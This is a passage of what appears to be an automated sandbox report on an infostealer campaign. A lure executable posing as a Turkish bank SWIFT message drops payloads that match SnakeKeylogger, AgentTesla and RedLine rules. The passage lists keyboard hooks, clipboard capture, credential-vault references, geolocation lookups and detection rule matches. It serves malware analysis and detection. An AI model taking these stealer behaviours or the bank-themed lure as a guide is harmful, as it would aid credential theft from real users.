                          Source: powershell.exe, 0000000F.00000002.1370958443.0000000005819000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                          Source: powershell.exe, 0000000F.00000002.1366121980.0000000004906000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                          Source: powershell.exe, 0000000F.00000002.1370958443.0000000005819000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                          Source: server02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                          Source: svchost.exe, 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, svchost.exe, 00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp, server02.exe.5.drString found in binary or memory: https://reallyfreegeoip.org/xml/
                          Source: server02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.228d
                          Source: server02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.228l
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                          Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.7:49702 version: TLS 1.2

                          Key, Mouse, Clipboard, Microphone and Screen Capturing

                          barindex
                          Source: server02.exe.5.dr, UltraSpeed.cs.Net Code: TakeScreenshot
                          Source: server02.exe.5.dr, UltraSpeed.cs.Net Code: VKCodeToUnicode
                          Source: 5.2.svchost.exe.6f05570.4.raw.unpack, cPKWk.cs.Net Code: I3Mi2zn6x
                          Source: 5.2.svchost.exe.6f42790.6.raw.unpack, cPKWk.cs.Net Code: I3Mi2zn6x
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindows user hook set: 0 keyboard low level C:\Users\user~1\AppData\Local\Temp\neworigin.exeJump to behavior
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000D6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_000D6B0C
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000D6D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_000D6D07
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_00916D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00916D07
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000D6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_000D6B0C
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_0009B63C GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,0_2_0009B63C
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeWindow created: window name: CLIPBRDWNDCLASS

                          System Summary

                          barindex
                          Source: 12.0.server02.exe.530000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: 12.0.server02.exe.530000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                          Source: 33.2.spadixes.exe.35a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 5.2.svchost.exe.6f05570.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                          Source: 2.2.spadixes.exe.3cc0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 5.2.svchost.exe.6f42790.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                          Source: 34.2.svchost.exe.73bfdf0.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: 34.2.svchost.exe.73bfdf0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                          Source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                          Source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                          Source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                          Source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                          Source: 5.2.svchost.exe.6f42790.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                          Source: 13.0.neworigin.exe.2f0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                          Source: 34.2.svchost.exe.73873c0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: 26.2.spadixes.exe.3f20000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 31.2.spadixes.exe.39e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 5.2.svchost.exe.6f05570.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                          Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 34.2.svchost.exe.73f8810.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: 34.2.svchost.exe.73f8810.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                          Source: 29.2.spadixes.exe.3680000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 34.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 34.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                          Source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                          Source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                          Source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                          Source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                          Source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                          Source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                          Source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                          Source: 00000002.00000002.1285293466.0000000003CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 00000005.00000002.1295590843.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 0000001A.00000002.1427486186.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                          Source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                          Source: 0000001D.00000002.1441006965.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 00000022.00000002.1574359559.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: 00000021.00000002.1489110172.00000000035A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 0000001F.00000002.1452830281.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: Process Memory Space: svchost.exe PID: 5088, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                          Source: Process Memory Space: svchost.exe PID: 5088, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: Process Memory Space: server02.exe PID: 6012, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: Process Memory Space: svchost.exe PID: 7848, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: C:\Users\user\AppData\Local\Temp\server02.exe, type: DROPPEDMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: C:\Users\user\AppData\Local\Temp\server02.exe, type: DROPPEDMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPEDMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                          Source: TrojanAI.exe.5.dr, opqcmgIPmeabY.csLong String: Length: 17605
                          Source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, opqcmgIPmeabY.csLong String: Length: 17605
                          Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                          Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, 00000000.00000003.1258915970.000000000372D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_9210698e-8
                          Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, 00000000.00000003.1258915970.000000000372D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_1a330727-1
                          Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_249774e2-3
                          Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_4483da7b-5
                          Source: spadixes.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                          Source: spadixes.exe, 00000002.00000000.1259354287.000000000096E000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ae132cc0-d
                          Source: spadixes.exe, 00000002.00000000.1259354287.000000000096E000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_a977ed07-2
                          Source: spadixes.exe, 0000001A.00000000.1403011029.000000000096E000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ecf8af26-9
                          Source: spadixes.exe, 0000001A.00000000.1403011029.000000000096E000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_606eacde-9
                          Source: spadixes.exe, 0000001D.00000000.1425187662.000000000096E000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ecfa8aac-9
                          Source: spadixes.exe, 0000001D.00000000.1425187662.000000000096E000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_4d4f745f-d
                          Source: spadixes.exe, 0000001F.00000000.1438617307.000000000096E000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f7cdfe7c-2
                          Source: spadixes.exe, 0000001F.00000000.1438617307.000000000096E000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_a37eb242-8
                          Source: spadixes.exe, 00000021.00000002.1484524878.000000000096E000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ecb5bc79-d
                          Source: spadixes.exe, 00000021.00000002.1484524878.000000000096E000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_1accc157-0
                          Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d0b4b338-1
                          Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_6fca400a-f
                          Source: spadixes.exe.0.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_372e7f09-c
                          Source: spadixes.exe.0.drString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_68937fad-8
                          Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.34.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6e04fe41-f
                          Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.34.drString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_b55f9d34-3
                          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000CD0B8: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_000CD0B8
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000BACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_000BACC5
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000C79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_000C79D3
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_009079D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_009079D3
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000AB0430_2_000AB043
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_0009335A0_2_0009335A
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000B410F0_2_000B410F
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_0009B11F0_2_0009B11F
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000AD1B90_2_000AD1B9
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000A123A0_2_000A123A
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000B724D0_2_000B724D
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000A02A40_2_000A02A4
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000B038E0_2_000B038E
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_0008E3B00_2_0008E3B0
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000C13CA0_2_000C13CA
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000893F00_2_000893F0
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_0009F5630_2_0009F563
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000B467F0_2_000B467F
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000CB6CC0_2_000CB6CC
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000896C00_2_000896C0
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000A06D90_2_000A06D9
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_0009FA570_2_0009FA57
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000EAACE0_2_000EAACE
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_00093B700_2_00093B70
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000B4BEF0_2_000B4BEF
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_0009FE6F0_2_0009FE6F
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000A9ED00_2_000A9ED0
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_00086F070_2_00086F07
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_0008AF500_2_0008AF50
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_00E430800_2_00E43080
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_008EB0432_2_008EB043
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_008D335A2_2_008D335A
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_008ED1B92_2_008ED1B9
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_008F410F2_2_008F410F
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_008DB11F2_2_008DB11F
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_008E02A42_2_008E02A4
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_008E123A2_2_008E123A
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_008F724D2_2_008F724D
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_008F038E2_2_008F038E
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_008CE3B02_2_008CE3B0
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_009013CA2_2_009013CA
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_008C93F02_2_008C93F0
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_008DF5632_2_008DF563
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_008C96C02_2_008C96C0
